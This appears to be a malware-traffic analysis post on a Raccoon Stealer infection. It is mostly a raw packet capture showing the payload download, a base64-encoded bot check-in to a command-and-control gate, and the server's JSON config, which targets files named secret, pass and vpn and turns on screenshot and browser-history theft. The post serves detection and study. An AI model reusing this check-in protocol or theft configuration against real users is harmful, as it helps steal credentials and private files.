Raccoon Stealer infection Malware svchost.exe 217.8.117.89 34.89.22.128

This is the latest sample of Raccoon which is an info stealer type malware available as a Malware as a Service. It can be obtained for a subscription and costs $200 per month. Raccoon malware has already infected over 100,000 devices and became one of the most mentioned viruses on the underground forums in 2019.

This malware uses base64 encoding for each infected host as you can see below in the packets and here is what it looks like decoded:

echo “Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw=” | base64 -d

bot_id=D50171F3-B1FD-41C9-AFBF-3DD2F72C90B7_ry4wn&config_id=2141da92b4ad3ac837e01675ce3a1681885395e0&data=null

2020-05-09 02:34:34.532063 IP 192.168.86.25.56399 > 217.8.117.89.80: Flags [P.], seq 1:398, ack 1, win 16425, length 397: HTTP: GET /svchost.exe HTTP/1.1

E…+`@…h…V…uY.O.P..L…..P.@)….GET /svchost.exe HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Accept-Encoding: gzip, deflate

Host: 217.8.117.89

Connection: Keep-Alive

2020-05-09 02:34:34.685440 IP 217.8.117.89.80 > 192.168.86.25.56399: Flags [.], ack 398, win 237, length 0

E..(.P@.*..\..uY..V..P.O……NdP…B+……..

2020-05-09 02:34:34.690750 IP 217.8.117.89.80 > 192.168.86.25.56399: Flags [.], seq 1:1437, ack 398, win 237, length 1436: HTTP: HTTP/1.1 200 OK

E….Q@.*…..uY..V..P.O……NdP….:..HTTP/1.1 200 OK

Date: Sat, 09 May 2020 06:35:24 GMT

Server: Apache/2.4.18 (Ubuntu)

Last-Modified: Fri, 08 May 2020 06:18:36 GMT

ETag: “83800-5a51cf7a4e700”

Accept-Ranges: bytes

Content-Length: 538624

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/x-msdos-program

2020-05-09 02:34:46.739624 IP 192.168.86.25.56400 > 151.101.0.133.443: Flags [P.], seq 1:130, ack 1, win 16403, length 129

E…+.@…….V..e…P….d..*..P.@.0…….|…x..^.H..8….^……..qK…9…i3+…../.5…

….. .

.2.8…….7…………..raw.githubusercontent.com.

…………..

2020-05-09 02:34:46.763774 IP 151.101.0.133.443 > 192.168.86.25.56400: Flags [.], ack 130, win 57, length 0

E..(.#@.7….e….V….P.*….eAP..9.9……..

2020-05-09 02:34:46.764848 IP 151.101.0.133.443 > 192.168.86.25.56400: Flags [.], seq 1:1397, ack 130, win 57, length 1396

E….$@.7….e….V….P.*….eAP..9……..]…Y….d.:.w..+.f..F..3.<.1Z.DOWNGRD. 9+.x…….ha..J.}…go….CZ…………………………………40..00………..I>…7Z-….C..0.. *.H……..0p1.0 ..U….US1.0…U.

..DigiCert Inc1.0…U….www.digicert.com1/0-..U…&DigiCert SHA2 High Assurance Server CA0…200506000000Z..220414120000Z0j1.0 ..U….US1.0…U…

California1.0…U….San Francisco1.0…U.

..GitHub, Inc.1.0…U….www.github.com0..”0.. *.H………….0..

……>=.2}…\..w..g…).r6jA….9.,….QY..

?..<….M….>…#.b………U..rh..R.<.!..%’6.sC..vU^RH..\..6…+….M..1…..E._+…2.8,)..$…Z……b.@,..G…=.W.h..X.O….”…7.W?;+..(……. +}a5…C…:..}nS.8…4………..a/…….v.sM..0…..F#.7}……………0…0…U.#..0…Qh…..u<..edb…Yr;0…U……..

iG..2.M..Eb_./.N:0{..U…t0r..www.github.com..*.github.com.

github.com..*.github.io. github.io..*.githubusercontent.com..githubusercontent.com0…U………..0…U.%..0…+………+…….0u..U…n0l04.2.0..http://crl3.digicert.com/sha2-ha-server-g6.crl04.2.0..http://crl4.digicert.com/sha2-ha-server-g6.crl0L..U. .E0C07.

`.H…l..0*0(..+………https://www.digicert.com/CPS0…g…..0….+……..w0u0$..+…..0…http://ocsp.digicert.com0M..+…..0..Ahttp://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0…U…….0.0..}.

+…..y……m…i.g.v.F.U.u.. 0…i..}.,At..I…..p.mG…q./…….G0E.!……..

…….}…L

2020-05-09 02:34:46.765979 IP 151.101.0.133.443 > 192.168.86.25.56400: Flags [.], seq 1397:2793, ack 130, win 57, length 1396

E….%@.7….e….V….P.+….eAP..9=^..Q..D……aH. .q&…!.RZ9..%…rQ..3o.3U.Q..:..u.”EE.YU$V.?./..m..#&c..K.]..\n……q./…….F0D. f.8..6…….!~…a…T`….}$S.. g>…H) .<..i……<……dn]i…v.Q…..y.Vm.7x…z..’….B……….q./. …..G0E. .?.I~L .Z.)..^..>o)..:.N…q.c…!../7..Eu.P…mf.T.<….&…..z W.0.. *.H……………..?….n…Gfh..Y……K..H.s…&….\J..x…NI….^p..^.%.W….t.T.6…….K.u.5.r…..;v….*T..$.O.z..HAd.yg…7..LeXe 4h.. .%]../.:…a.H…v>,.n…i}&.Y.}……G……K..k..a..eE!._.C…7 .;lMb-c…..+a../5.9N)1.^.$[.._..b………….D..G80{r. ..x….0…0……………\..m.+B.]..0.. *.H……..0l1.0 ..U….US1.0…U.

..DigiCert Inc1.0…U….www.digicert.com1+0)..U…”DigiCert High Assurance EV Root CA0…131022120000Z..281022120000Z0p1.0 ..U….US1.0…U.

..DigiCert Inc1.0…U….www.digicert.com1/0-..U…&DigiCert SHA2 High Assurance Server CA0..”0.. *.H………….0..

……./.$..m._..

2020-05-09 02:34:46.971465 IP 192.168.86.25.56401 > 34.89.22.128.80: Flags [P.], seq 1:189, ack 1, win 16685, length 188: HTTP: POST /gate/log.php HTTP/1.1

E…+.@…~…V.”Y…Q.P9…9i%.P.A-….POST /gate/log.php HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

Content-Type: application/x-www-form-urlencoded

Content-Length: 155

Host: 34.89.22.128

2020-05-09 02:34:46.971475 IP 192.168.86.25.56401 > 34.89.22.128.80: Flags [P.], seq 189:344, ack 1, win 16685, length 155: HTTP

E…+.@…~…V.”Y…Q.P9…9i%.P.A-….params=Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw=

2020-05-09 02:34:47.267855 IP 34.89.22.128.80 > 192.168.86.25.56401: Flags [P.], seq 1:1112, ack 344, win 508, length 1111: HTTP: HTTP/1.1 200 OK

E…?.@…..”Y….V..P.Q9i%.9..YP….v..HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)

Date: Sat, 09 May 2020 06:36:06 GMT

Content-Type: application/json

Transfer-Encoding: chunked

Connection: keep-alive

Access-Control-Allow-Origin: *

380

{“url”:”http://34.89.22.128/file_handler/file.php?hash=196880b27e06197d171bf944d311f8ff63715f76&js=9e862d9b0efd325167e20ad356b9eda91bf37b8d&callback=http://34.89.22.128/gate”,”attachment_url”:”http://34.89.22.128/gate/sqlite3.dll”,”libraries”:”http://34.89.22.128/gate/libs.zip”,”ip”:”73.135.186.44″,”location”:{“country”:”United States”,”country_code”:”US”,”state”:”Maryland”,”state_code”:”MD”,”city”:”Catonsville”,”zip”:21228,”latitude”:39.2812,”longitude”:-76.7406},”config”:{“masks”:[{“name”:12,”subfolders”:[“true”],”size_limit”:40,”mask”:”secret.txt, secret.doc, secret.docx, secret*.txt, secret*.doc, secret*.docx, pass.txt, pass.doc, pass.docx, pass*.txt, pass*.doc, pass*.docx, vpn.txt, vpn.doc, vpn.docx, vpn*.txt, vpn*.doc, vpn*.docx, *vpn.txt, *vpn.doc, *vpn.docx”,”path”:”%USERPROFILE%\\”}],”loader_urls”:null},”lu”:null,”rm”:1,”is_screen_enabled”:1,”is_history_enabled”:1,”depth”:3}

2020-05-09 02:34:47.290435 IP 192.168.86.25.56402 > 34.89.22.128.80: Flags [S], seq 222080979, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0

E..4+.@….-..V.”Y…R.P.<…….. .e……………

2020-05-09 02:34:47.409675 IP 34.89.22.128.80 > 192.168.86.25.56402: Flags [S.], seq 1599144664, ack 222080980, win 65320, options [mss 1420,nop,nop,sackOK,nop,wscale 7], length 0

E..4..@….)”Y….V..P.R_Q…<…..($……………

2020-05-09 02:34:47.409919 IP 192.168.86.25.56402 > 34.89.22.128.80: Flags [.], ack 1, win 16685, length 0

E..(+.@….8..V.”Y…R.P.<.._Q..P.A-#/……..

2020-05-09 02:34:47.413914 IP 192.168.86.25.56402 > 34.89.22.128.80: Flags [P.], seq 1:268, ack 1, win 16685, length 267: HTTP: GET /gate/sqlite3.dll HTTP/1.1

E..3+.@…~,..V.”Y…R.P.<.._Q..P.A-….GET /gate/sqlite3.dll HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Host: 34.89.22.128

Connection: Keep-Alive

2020-05-09 02:34:47.600549 IP 34.89.22.128.80 > 192.168.86.25.56402: Flags [.], seq 1:1421, ack 268, win 509, length 1420: HTTP: HTTP/1.1 200 OK

E…]f@….C”Y….V..P.R_Q…<..P….Y..HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)

Date: Sat, 09 May 2020 06:36:06 GMT

Content-Type: application/octet-stream

Content-Length: 916735